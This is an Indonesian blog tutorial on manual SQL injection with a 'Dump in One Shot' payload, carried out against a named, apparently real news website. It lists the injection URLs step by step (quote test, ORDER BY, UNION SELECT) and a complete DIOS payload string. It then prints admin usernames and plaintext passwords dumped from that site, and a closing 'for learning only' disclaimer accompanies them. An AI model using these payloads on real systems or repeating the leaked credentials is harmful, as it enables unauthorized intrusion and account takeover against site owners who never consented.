Selasa, 28 Agustus 2018

SQL Injection Manual dengan DIOS (Dump in One Shot)


Assalamualaikum..

Halo semuanya, apa kabar? Artikel kali ini saya akan membagikan tutorial SQL Injection Manual dengan DIOS (Dump In One Shot). Artikel ini adalah lanjutan dari artikel sebelumnya. Saya sarankan untuk membaca terlebih dahulu artikel sebelumnya karena itu adalah dasar dari SQL Injection.

Seebelumnya mungkin kalian bertanya, apa itu DIOS. DIOS adalah singkatan dari Dump in One Shot. Kalau diterjemahkan dalam bahasa Indonesia artinya Buang dalam Satu Tembakan. Jadi, kita bisa dump atau mengeluarkan isi database sebuah website dengan satu request. Tidak perlu convert nama tabel dan sekaligus kita bisa mengetahui semua tabel dan kolom secara bersamaan.

Di sini saya sudah memiliki website target, yaitu http://lakhamindonesianews.id/single.php?id=124


Tambahkan (') untuk mengecek web tersebut vuln atau tidak. http://lakhamindonesianews.id/single.php?id=124'. Klik tulisan Load URL yang berada di atas kiri hackbar. Atau kalau mau lebih cepat, tekan CTRL+A.


Bisa kita lihat, tampilan web berubah menjadi putih atau blank. Seperti yang saya bilang pada artikel sebelumnya, jika ada perubahan pada tampilan web setelah ditambahkan (') maka kemungkinan besar vuln SQL Injection.

Selanjutnya, kita cari jumlah column database website tersebut dengan perintah Order By. Perintahnya menjadi http://lakhamindonesianews.id/single.php?id=124' order by 1-- -.


Website kembali normal. Sekarang kita urutkan angka sampai web kembali error seperti ketika ditambahkan ('). Perintahnya seperti ini:



Web kembali error di angka 15. Itu artinya website tersebut hanya memiliki 14 column. 

Selanjutnya, kita gunakan perintah Union Select untuk mengurutkan jumlah column. Jangan lupa menambahkan (-)  di depan angka URL. Maka perintahnya menjadi http://lakhamindonesianews.id/single.php?id=-124' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -


Kali ini tampilan website kembali berubah. Sekarang terdapat angka 2,4,5,6, dan 9. Saya sering menyebutnya sebegai angka togel atau angka ajaib :v

Nah, jika pada tutorial sebelumnya kita harus memasukkan group_concat dan kawan-kawannya, kali ini tidak perlu. Cukup ganti salah satu angka ajaib dengan DIOS yang ada pada hackbar. Caranya, tekan kolom UNION BASED kemudian cari DIOS MySQL lalu pilih salah satu DIOS. Di sini saya menggunakan DIOS by Madblood. 

(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

Masukkan DIOS di atas pada salah satu angka ajaib. Saya pilih angka 5. Jadi perintahnya seperti ini:


Sekarang klik tulisan Execute di sebelah kiri atas. Atau kalau mau lebih cepat, tekan CTRL+X.


Sekedar info, DIOS by Madblood adalah DIOS racikan dari Madblood alias Fuad Khusnil. Beliau adalah salah satu sesepuh injector yang berasal dari Indonesia. 


Taraaa.. Kita berhasil dump semua table dan column. Untuk result yang di sebelah kiri tanda titik dua (:) adalah table_name dan dan di sebelah kanan tanda titik dua (:) adalah column_name.

Misi kita adalah mencari username dan password admin. Geser ke bawah dan cari nama tabel yang kira-kira berisi username dan password admin. Feeling saya mengatakan tabel tersebut adalah user.


Sekarang kita dump table user. Caranya begini. Ganti information_schema.columns dengan nama tabel yang akan di dump. Karena kita mau dump tabel user, maka kita ganti information_schema.columns menjadi user. Kemudian, ganti table_name dan column_name dengan column yang akan di dump. Karena kita mau dump username dan password, maka column yang kita dump adalah user_name dan user_pass. Perintahnya menjadi seperti ini:



Yuhu.. Kita sudah berhasil dump username dan password admin.

bangpius :bangpius
pakarham2018 :pakarham2018
lakhamindonesianews.id :sembarangji

Sampai sini misi kita berhasil. Dimohon untuk tidak merusak websitenya, karena tutorial ini hanya untuk pembelajaran saja :p

Oke sekian tutorial mengenai SQL Injection Manual dengan DIOS (Dump in One Shot). Lebih dan kurangnya saya mohoh maaf. Jika ingin bertanya silahkan di komentar, InshaAllah saya jawab :D

Wassalamualaikum..

0 komentar:

Posting Komentar